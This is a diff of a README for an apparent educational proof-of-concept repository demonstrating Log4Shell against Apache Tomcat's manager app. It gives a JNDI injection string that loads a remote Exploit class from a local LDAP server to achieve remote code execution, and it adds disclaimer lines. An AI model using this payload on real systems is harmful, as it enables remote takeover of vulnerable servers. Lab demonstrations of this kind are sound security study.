many-fac3d-g0d/apache-tomcat-log4j/README.md

 ### Attack
 Input ${jndi:ldap://127.0.0.1:1389/Exploit} in the field 'XML Configuration file path' inside http://localhost:8080/manager/html manager app

-Exploit class is loaded and RCE done (Calculator app will be loaded)
+Exploit class is loaded and RCE loaded (Calculator app will be opened)

 ## Disclaimer

 The repo is just a POC done for educational purpose.
+The repo owner is not responsible for any damages done.
+As a moral note, Don't be evil.

 ## References
 LDAP exploit https://github.com/mbechler/marshalsec